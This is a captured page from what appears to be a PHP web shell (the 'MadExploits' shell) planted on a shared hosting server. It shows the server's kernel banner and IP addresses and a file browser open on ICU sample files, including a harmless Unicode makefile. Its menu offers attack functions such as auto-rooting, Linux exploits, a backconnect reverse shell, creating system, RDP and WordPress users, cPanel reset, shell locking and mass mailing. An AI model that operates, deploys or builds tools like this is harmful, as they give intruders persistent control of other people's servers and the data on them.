Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.128.95.217
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
libicu /
usr /
share /
doc /
alt-libicu-devel /
samples /
uresb /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
1.95
KB
-rw-r--r--
en.txt
1.92
KB
-rw-r--r--
readme.txt
2.53
KB
-rw-r--r--
resources.mak
698
B
-rw-r--r--
resources.vcxproj
8.43
KB
-rw-r--r--
resources.vcxproj.filters
868
B
-rw-r--r--
root.txt
1.95
KB
-rw-r--r--
sr.txt
1.98
KB
-rw-r--r--
uresb.c
10.55
KB
-rw-r--r--
uresb.sln
2.05
KB
-rw-r--r--
uresb.vcxproj
9.9
KB
-rw-r--r--
uresb.vcxproj.filters
878
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : resources.mak
## Copyright (C) 2016 and later: Unicode, Inc. and others. ## License & terms of use: http://www.unicode.org/copyright.html#License ## ## Copyright (c) 2001-2009 International Business Machines ## Corporation and others. All Rights Reserved. PACKAGE_NAME = uresb TARGETS = en.res root.res sr.res !IF "$(CFG)" == "x64\Release" || "$(CFG)" == "x64\Debug" GENRB = ..\..\..\bin64\genrb.exe !ELSE GENRB = ..\..\..\bin\genrb.exe !ENDIF GENRBOPT = -s . -d . all : $(TARGETS) @echo All targets are up to date clean : -erase $(TARGETS) en.res : en.txt $(GENRB) $(GENRBOPT) $? root.res : root.txt $(GENRB) $(GENRBOPT) $? sr.res : sr.txt $(GENRB) $(GENRBOPT) --encoding cp1251 $?
Close